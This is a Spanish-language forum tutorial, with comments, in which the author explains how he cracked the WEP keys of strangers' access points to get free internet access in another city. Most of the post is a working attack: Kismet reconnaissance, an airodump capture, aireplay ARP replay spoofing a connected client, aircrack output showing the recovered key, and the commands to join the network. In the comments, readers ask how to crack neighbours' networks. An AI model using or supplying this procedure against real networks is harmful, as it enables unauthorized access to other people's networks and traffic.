Crackear WEP

Imagen de RazaMetaL

Hace poco necesitaba tener acceso a internet en otra ciudad, en el area donde me encontraba la mayoría de puntos de acceso tenia WEP habilitado. El siguiente procedimiento describe con fines educativos como obtener la clave y por ende acceso a una red que probablemente tenga salida a Internet.

Antes de empezar deben tener en cuenta que si el access point no tiene ningún cliente registrado nuestros intentos van a ser nulos, esto se debe a que necesitamos hacer spoofing de las peticiones ARP de un cliente que ya este conectado al access point.

Tengo una tarjeta con chipset prims2 funcionando con wlan-ng:


aptitude install linux-wlan-ng

Previamente debemos tener instaladas varias herramientas:


aptitude install kismet aircrack

Kismet : Nos permite obtener información necesaria como el canal en el que esta configurado el acess point, el essid, la mac address del access point;
Airodump : captura los paquetes de una red inalambrica en un archivo, este archivo es compatible con el formato pcap de tcpdump, ethereal, etc;
Aireplay: toma el tráfico ARP y lo reenvia al access point, haciendo APR spoofing del cliente asociado al access point;
Aircrack: analiza los archivos capturados por airodump y extraerá la clave WEP.

Empezamos entonces, con kismet vamos a hacer un scaneo para conocer cual es el ssid y el canal en el que esta trabajando el punto de acceso.

Mi archivo de configuración contiene entre otras cosas el source que no es mas que la descripción de mi adaptador inalambrico [eth2], el chipset [Prism2] y modulo que utiliza [wlanng]:


# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README under the
# CAPTURE SOURCES section.
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
#source=none,none,addme
source=wlanng,eth2,Prism

Kismet nos dice que el SSID es ssid y el esta trabajando en el canal 6 y nos dice la mac addres del access point. Necesitamos ademas conocer la mac address de algun cliente que se encuentre asociado ya al AP, asi que en el menu principal del kismet presionamos Shift+C y eso nos mostrará una lista de clientes asociados. Bastará con escoger uno :)

Ahora utilizamos airodump para capturar el trafico y generar un archivo en formato pcap para finalmente con un ckackeador tratar de obtener la clave WEP, aircrack necesita la suficiente información para hacer esto:


iwconfig eth2 mode Monitor
iwconfig eth2 channel 6
airodump eth2 ssid-crack 00:0F:3D:47:C0:31

Este comando indica a airodump que capture el trafico en la interface eth2 en el canal 6 y que envie la captura al archivo ssid-crack que airodump grabara como ssid-crack.cap

Desde otra consola enviaremos trafico con aireplay para que el archivo de captura obtenga el suficiente tráfico para poder obtener la clave WEP con aircrack, para obtener una clave de 64 bits se requiere capturar de 50000 a 200000 IVs y para 128 bits se necesitan de 200000 a 700000 IVs. Aquie es donde entra aireplay, generará el tráfico suficiente para que los IVs que tanto necesitamos se incrementen rapidamente:


aireplay eth2 -h 00:02:6f:01:85:d1 -b 00:0F:3D:47:C0:31 -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -3 -x 512
Saving ARP requests in replay_arp-0329-194426.cap
You must also start airodump to capture replies.
Read 0 packets (got 0 ARP requests), sent 0 packets...

Airodump nos mostrará algo como esto:


BSSID PWR Beacons # Data CH MB ENC ESSID

00:10:E7:F5:D4:72 -1 82 0 6 11 OPN 2W
00:0F:3D:47:C0:31 -1 112405 339 6 54 WEP ssid

BSSID STATION PWR Packets ESSID

Ahora es cuestion de esperar, mi archivo de captura alcanzó 50MB luego de 12 horas :). Aircrack necesita determinada cantidad de trafico IV wep data packets capturados para poder hacer su trabajo.


ls -alh ssid-crack.cap

-rw-r--r-- 1 root root 50M 2006-03-29 08:54 ssid-crack.cap

Finalmente, vamos a obtener la clave WEP, esto también tomará su tiempo:


aircrack -m 00:0F:3D:47:C0:31 ssid-crack.cap
Opening ssid-crack.cap
Read 698097 packets.

# BSSID ESSID Encryption

1 00:0F:3D:47:C0:31 ssid WEP (554 IVs)
2 00:10:E7:F5:D4:72 2W None (0.0.0.0)

Index number of target network ? 1

aircrack 2.3

[00:00:04] Tested 131073 keys (got 554 IVs)

KB depth byte(vote)
0 0/252 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0)
1 0/252 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0)
2 0/252 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0)
3 0/ 1 82( 3) 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0)
4 0/252 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0)
5 0/ 1 C2( 15) 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0)
6 0/ 3 0A( 4) 84( 4) FD( 4) 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0)
7 0/251 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0)
8 2/251 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0) 09( 0) 0A( 0)

Ahora nos vamos por una taza de café, miramos una película, o hacemos cualquier cosa para pasar el tiempo ya que este proceso va a tomar su tiempo. Sería genial si al menos supiesemos de cuantos bits es la encriptación, ese parámetro lo podemos definir pasándole el modificador -n al comando aircrack.

Luego de un rato aircrack nos dara la llave :)


KEY FOUND! [ CACA098765 ]

Y el ultimo paso:


iwconfig eth2 essid ssid key CACA098765
dhclient3 eth2
ping www.google.com

Comentarios

Estoy recibiendo en la

Imagen de dafer

Estoy recibiendo en la universidad una materia que se llamada redes inalambricas LAN lo malo es que solo trabaja en Gúindous para las clases practicas, y esto me va a servir para el trabajo final ya que dijo sobre la seguridad WEP no era muy buena y si alguien le presenta un proyecto referente a esto seria exonerado, GRACIAS

Sigue las instrucciones del

Imagen de RazaMetaL

Sigue las instrucciones del manual, haz la demostracion y pide que te exoneren :)

------------

Antes de preguntar visita el [url=http://www.sindominio.net/ayuda/preguntas-inteligentes.html]link[/url] :evil:

 

[img]http://www.bbspot.com/Images/News_Features/2003/01/os_quiz/debian.jpg[/img]

-----

Visita este [url=http://www.sindominio.net/ayuda/preguntas-inteligentes.html]link[/url] :evil:

[img]http://www.bbspot.com/Images/News_Features/2003/01/os_quiz/debian.jpg[/img]

(adsbygoogle = window.adsbygoogle || []).push({});

Lo mismo con Access Point.

Amigos.... tengo una pregunta que me surgio hace poco y me parece que soy el unico trastornado con esto :S.
Se que Crackear con el Wifislax o el Aircrack es posible por medio de una placa de red inalambrica, lo probe ya con una Realtek PCI y una USB, son marca enconre con chip Realtek.
Ahora el problema es que en mi casa no tengo ninguna red vecina. Para eso encontre una solución y es poner una antena en el techo de casa. Pero la antena no es directa a la placa porke pierdo mucha señal hasta llegar a mi pc. Asi que la mejor opción es usar un Access point, para poder conectar a alguna red desde el techo de mi casa y bajar con la conexion en un cable utp y listo. Pero claro, suena tan facil....
Como hago para desbloquear una clave de red por medio de un AP y no por medio de uan red inalambrica.?????
Por favor si alguien puede contestar se los agradecere :D

pfffffffff!!! 12 hrs...!

Esta dos dos tu pasos... pero 12 hrs es mucho tiempo para crackear una web... hay mejores metodos menos pasos y mucho mas rapido..!! ;) pero bravo!! es funcional

Ing. Pedro Ismael Fernández Marín
SysAdmin|Servicios de Internert|Redes
CONECULTA - Chiapas
email: pfernandez@conecultachiapas.gob.mx

Fijate en la fecha en que fué

Imagen de RazaMetaL

Fijate en la fecha en que fué escrito este manual. Ahora se puede crackear en cosa de minutos con airodump-ng, aireplay-ng y aircrack-ng.

-----

Visita este [url=http://www.sindominio.net/ayuda/preguntas-inteligentes.html]link[/url] :evil:

[img]http://www.bbspot.com/Images/News_Features/2003/01/os_quiz/debian.jpg[/img]

(adsbygoogle = window.adsbygoogle || []).push({});